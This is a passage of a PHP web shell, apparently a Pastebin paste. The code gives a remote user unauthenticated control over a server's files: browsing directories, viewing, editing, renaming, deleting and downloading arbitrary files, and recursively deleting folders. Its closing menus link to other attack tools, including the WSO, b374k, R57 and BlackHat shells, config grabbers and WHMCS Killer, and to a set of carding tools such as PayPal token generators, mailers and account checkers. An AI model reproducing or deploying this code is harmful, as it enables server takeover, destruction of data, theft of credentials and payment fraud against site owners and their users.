  4203.         if($dir_rename) {
  4204.             $act = "<script>window.location='?dir=".dirname($dir)."';</script>";
  4205.         } else {
  4206.             $act = "<font color=red>permission denied</font>";
  4207.         }
  4208.     echo "".$act."<br>";
  4209.     }
  4210.     echo "<form method='post'>
  4211.     <input type='text' value='".basename($dir)."' name='fol_rename' style='width: 450px;' height='10'>
  4212.     <input type='submit' name='dir_rename' value='rename'>
  4213.     </form>";
  4214. } elseif($_GET['act'] == 'delete_dir') {
  4215.     function Delete($path)
  4216. {
  4217.     if (is_dir($path) === true)
  4218.     {
  4219.         $files = array_diff(scandir($path), array('.', '..'));
  4220.         foreach ($files as $file)
  4221.         {
  4222.             Delete(realpath($path) . '/' . $file);
  4223.         }
  4224.         return rmdir($path);
  4225.     }
  4226.     else if (is_file($path) === true)
  4227.     {
  4228.         return unlink($path);
  4229.     }
  4230.     return false;
  4231. }
  4232.     $delete_dir = Delete($dir);
  4233.     if($delete_dir) {
  4234.         $act = "<script>window.location='?dir=".dirname($dir)."';</script>";
  4235.     } else {
  4236.         $act = "<font color=red>could not remove ".basename($dir)."</font>";
  4237.     }
  4238.     echo $act;
  4239. } elseif($_GET['act'] == 'view') {
  4240.     echo "Filename: <font color=lime>".basename($_GET['file'])."</font> [ <a href='?act=view&dir=$dir&file=".$_GET['file']."'><b>view</b></a> ] [ <a href='?act=edit&dir=$dir&file=".$_GET['file']."'>edit</a> ] [ <a href='?act=rename&dir=$dir&file=".$_GET['file']."'>rename</a> ] [ <a href='?act=download&dir=$dir&file=".$_GET['file']."'>download</a> ] [ <a href='?act=delete&dir=$dir&file=".$_GET['file']."'>delete</a> ]<br>";
  4241.     echo "<textarea readonly>".htmlspecialchars(@file_get_contents($_GET['file']))."</textarea>";
  4242. } elseif($_GET['act'] == 'edit') {
  4243.     if($_POST['save']) {
  4244.         $save = file_put_contents($_GET['file'], $_POST['src']);
  4245.         if($save) {
  4246.             $act = "<font color=lime>Saved!</font>";
  4247.         } else {
  4248.             $act = "<font color=red>permission denied</font>";
  4249.         }
  4250.     echo "".$act."<br>";
  4251.     }
  4252.     echo "Filename: <font color=lime>".basename($_GET['file'])."</font> [ <a href='?act=view&dir=$dir&file=".$_GET['file']."'>view</a> ] [ <a href='?act=edit&dir=$dir&file=".$_GET['file']."'><b>edit</b></a> ] [ <a href='?act=rename&dir=$dir&file=".$_GET['file']."'>rename</a> ] [ <a href='?act=download&dir=$dir&file=".$_GET['file']."'>download</a> ] [ <a href='?act=delete&dir=$dir&file=".$_GET['file']."'>delete</a> ]<br>";
  4253.     echo "<form method='post'>
  4254.     <textarea name='src'>".htmlspecialchars(@file_get_contents($_GET['file']))."</textarea><br>
  4255.     <input type='submit' value='Save' name='save' style='width: 500px;'>
  4256.     </form>";
  4257. } elseif($_GET['act'] == 'rename') {
  4258.     if($_POST['do_rename']) {
  4259.         $rename = rename($_GET['file'], "$dir/".htmlspecialchars($_POST['rename'])."");
  4260.         if($rename) {
  4261.             $act = "<script>window.location='?dir=".$dir."';</script>";
  4262.         } else {
  4263.             $act = "<font color=red>permission denied</font>";
  4264.         }
  4265.     echo "".$act."<br>";
  4266.     }
  4267.     echo "Filename: <font color=lime>".basename($_GET['file'])."</font> [ <a href='?act=view&dir=$dir&file=".$_GET['file']."'>view</a> ] [ <a href='?act=edit&dir=$dir&file=".$_GET['file']."'>edit</a> ] [ <a href='?act=rename&dir=$dir&file=".$_GET['file']."'><b>rename</b></a> ] [ <a href='?act=download&dir=$dir&file=".$_GET['file']."'>download</a> ] [ <a href='?act=delete&dir=$dir&file=".$_GET['file']."'>delete</a> ]<br>";
  4268.     echo "<form method='post'>
  4269.     <input type='text' value='".basename($_GET['file'])."' name='rename' style='width: 450px;' height='10'>
  4270.     <input type='submit' name='do_rename' value='rename'>
  4271.     </form>";
  4272. } elseif($_GET['act'] == 'delete') {
  4273.     $delete = unlink($_GET['file']);
  4274.     if($delete) {
  4275.         $act = "<script>window.location='?dir=".$dir."';</script>";
  4276.     } else {
  4277.         $act = "<font color=red>permission denied</font>";
  4278.     }
  4279.     echo $act;
  4280. }else {
  4281.     if(is_dir($dir) == true) {
  4282.         echo '<table width="100%" class="table_home" border="0" cellpadding="3" cellspacing="1" align="center">
  4283.         <tr>
  4284.         <th class="th_home"><center>Name</center></th>
  4285.         <th class="th_home"><center>Type</center></th>
  4286.         <th class="th_home"><center>Size</center></th>
  4287.         <th class="th_home"><center>Last Modified</center></th>
  4288.         <th class="th_home"><center>Permission</center></th>
  4289.         <th class="th_home"><center>Action</center></th>
  4290.         </tr>';
  4291.         $scandir = scandir($dir);
  4292.         foreach($scandir as $dirx) {
  4293.             $dtype = filetype("$dir/$dirx");
  4294.             $dtime = date("F d Y g:i:s", filemtime("$dir/$dirx"));
  4295.             if(!is_dir("$dir/$dirx")) continue;
  4296.             if($dirx === '..') {
  4297.                 $href = "<a href='?dir=".dirname($dir)."'>$dirx</a>";
  4298.             } elseif($dirx === '.') {
  4299.                 $href = "<a href='?dir=$dir'>$dirx</a>";
  4300.             } else {
  4301.                 $href = "<a href='?dir=$dir/$dirx'>$dirx</a>";
  4302.             }
  4303.             if($dirx === '.' || $dirx === '..') {
  4304.                 $act_dir = "<a href='?act=newfile&dir=$dir'>newfile</a> | <a href='?act=newfolder&dir=$dir'>newfolder</a>";
  4305.                 } else {
  4306.                 $act_dir = "<a href='?act=rename_dir&dir=$dir/$dirx'>rename</a> | <a href='?act=delete_dir&dir=$dir/$dirx'>delete</a>";
  4307.             }
  4308.             echo "<tr>";
  4309.             echo "<td class='td_home'><img src='data:image/png;base64,R0lGODlhEwAQALMAAAAAAP///5ycAM7OY///nP//zv/OnPf39////wAAAAAAAAAAAAAAAAAAAAAA"."AAAAACH5BAEAAAgALAAAAAATABAAAARREMlJq7046yp6BxsiHEVBEAKYCUPrDp7HlXRdEoMqCebp"."/4YchffzGQhH4YRYPB2DOlHPiKwqd1Pq8yrVVg3QYeH5RYK5rJfaFUUA3vB4fBIBADs='>$href</td>";
  4310.             echo "<td class='td_home'><center>$dtype</center></td>";
  4311.             echo "<td class='td_home'><center>-</center></th>";
  4312.             echo "<td class='td_home'><center>$dtime</center></td>";
  4313.             echo "<td class='td_home'><center>".w("$dir/$dirx",perms("$dir/$dirx"))."</center></td>";
  4314.             echo "<td class='td_home' style='padding-left: 15px;'>$act_dir</td>";
  4315.         }
  4316.         echo "</tr>";
  4317.         foreach($scandir as $file) {
  4318.             $ftype = filetype("$dir/$file");
  4319.             $ftime = date("F d Y g:i:s", filemtime("$dir/$file"));
  4320.             $size = filesize("$dir/$file")/1024;
  4321.             $size = round($size,3);
  4322.             if($size > 1024) {
  4323.                 $size = round($size/1024,2). 'MB';
  4324.             } else {
  4325.                 $size = $size. 'KB';
  4326.             }
  4327.             if(!is_file("$dir/$file")) continue;
  4328.             echo "<tr>";
  4329.             echo "<td class='td_home'><img src='data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAAAXNSR0IArs4c6QAAAAZiS0dEAP8A/wD/oL2nkwAAAAlwSFlzAAALEwAACxMBAJqcGAAAAAd0SU1FB9oJBhcTJv2B2d4AAAJMSURBVDjLbZO9ThxZEIW/qlvdtM38BNgJQmQgJGd+A/MQBLwGjiwH3nwdkSLtO2xERG5LqxXRSIR2YDfD4GkGM0P3rb4b9PAz0l7pSlWlW0fnnLolAIPB4PXh4eFunucAIILwdESeZyAifnp6+u9oNLo3gM3NzTdHR+//zvJMzSyJKKodiIg8AXaxeIz1bDZ7MxqNftgSURDWy7LUnZ0dYmxAFAVElI6AECygIsQQsizLBOABADOjKApqh7u7GoCUWiwYbetoUHrrPcwCqoF2KUeXLzEzBv0+uQmSHMEZ9F6SZcr6i4IsBOa/b7HQMaHtIAwgLdHalDA1ev0eQbSjrErQwJpqF4eAx/hoqD132mMkJri5uSOlFhEhpUQIiojwamODNsljfUWCqpLnOaaCSKJtnaBCsZYjAllmXI4vaeoaVX0cbSdhmUR3zAKvNjY6Vioo0tWzgEonKbW+KkGWt3Unt0CeGfJs9g+UU0rEGHH/Hw/MjH6/T+POdFoRNKChM22xmOPespjPGQ6HpNQ27t6sACDSNanyoljDLEdVaFOLe8ZkUjK5ukq3t79lPC7/ODk5Ga+Y6O5MqymNw3V1y3hyzfX0hqvJLybXFd++f2d3d0dms+qvg4ODz8fHx0/Lsbe3964sS7+4uEjunpqmSe6e3D3N5/N0WZbtly9f09nZ2Z/b29v2fLEevvK9qv7c2toKi8UiiQiqHbm6riW6a13fn+zv73+oqorhcLgKUFXVP+fn52+Lonj8ILJ0P8ZICCF9/PTpClhpBvgPeloL9U55NIAAAAAASUVORK5CYII='><a href='?act=view&dir=$dir&file=$dir/$file'>$file</a></td>";
  4330.             echo "<td class='td_home'><center>$ftype</center></td>";
  4331.             echo "<td class='td_home'><center>$size</center></td>";
  4332.             echo "<td class='td_home'><center>$ftime</center></td>";
  4333.             echo "<td class='td_home'><center>".w("$dir/$file",perms("$dir/$file"))."</center></td>";
  4334.             echo "<td class='td_home' style='padding-left: 15px;'><a href='?act=edit&dir=$dir&file=$dir/$file'>edit</a> | <a href='?act=rename&dir=$dir&file=$dir/$file'>rename</a> | <a href='?act=delete&dir=$dir&file=$dir/$file'>delete</a> | <a href='?act=download&dir=$dir&file=$dir/$file'>download</a></td>";
  4335.         }
  4336.         echo "</tr></table>";
  4337.     } else {
  4338.         echo "<font color=red>can't open directory</font>";
  4339.     }
  4340.     }
  4341. echo "<center><hr><form>
  4342. <select onchange='if (this.value) window.open(this.value);'>
  4343.    <option selected='selected' value=''> Tools Creator </option>
  4344.    <option value='$ling=wso'>WSO 2.8.1</option>
  4345.    <option value='$ling=injection'>1n73ction v3</option>
  4346.    <option value='$ling=wk'>WHMCS Killer</option>
  4347.    <option value='$ling=adminer'>Adminer</option>
  4348.    <option value='$ling=b374k'>b374k Shell</option>
  4349.    <option value='$ling=scanner'>Scanner Uploader</option>
  4350.    <option value='$ling=b374k323'>b374k 3.2</option>  
  4351.    <option value='$ling=bh'>BlackHat Shell</option>      
  4352.    <option value='$ling=vhost'>Grab Config Vhost</option>  
  4353.    <option value='$ling=grabber'>Grab Config</option>  
  4354.    <option value='$ling=dhanus'>Dhanush Shell</option>    
  4355.    <option value='$ling=r57'>R57 Shell</option>    
  4356.    <option value='$ling=encodedecode'>Encode Decode</option>    
  4357. </select>
  4358. <select onchange='if (this.value) window.open(this.value);'>
  4359.    <option selected='selected' value=''> Tools Carder </option>
  4360.    <option value='$ling=extractor'>DB Email Extractor</option>
  4361.    <option value='$ling=promailerv2'>Pro Mailer V2</option>    
  4362.    <option value='$ling=bukalapak'>BukaLapak Checker</option>        
  4363.    <option value='$ling=tokopedia'>TokoPedia Checker</option>  
  4364.    <option value='$ling=tokenpp'>Paypal Token Generator</option>  
  4365.    <option value='$ling=mailer'>Mailer</option>  
  4366.    <option value='$ling=gamestopceker'>GamesTop Checker</option>
  4367.    </select>
  4368. <noscript><input type='submit' value='Submit'></noscript>
  4369. ";
  4370. ?>
  4371. </html>
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
 
Top